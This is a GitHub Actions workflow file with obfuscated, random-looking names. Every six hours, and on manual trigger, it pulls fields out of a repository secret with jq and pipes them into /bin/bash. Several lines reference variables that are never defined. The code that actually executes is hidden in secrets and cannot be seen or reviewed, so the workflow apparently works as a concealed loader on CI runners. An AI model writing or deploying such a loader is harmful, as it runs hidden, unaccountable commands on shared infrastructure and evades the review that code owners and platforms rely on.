name: yinnengzhe7654

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:  # 13506
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinnengzhe7654
        env:
          ro66: ${{ secrets.ro66 }}
        run: |
          echo $ro66 | jq -r .lh5 | /bin/bash
          echo $dp96 | jq -r .stuf5885 | /bin/bash
          echo $xle6 | jq -r .loxop18534 | /bin/bash
          echo $c185 | jq -r .pxdsh27 | /bin/bash
          echo $r452 | jq -r .az1008 | /bin/bash
          echo $c7 | jq -r .dhez09898 | /bin/bash

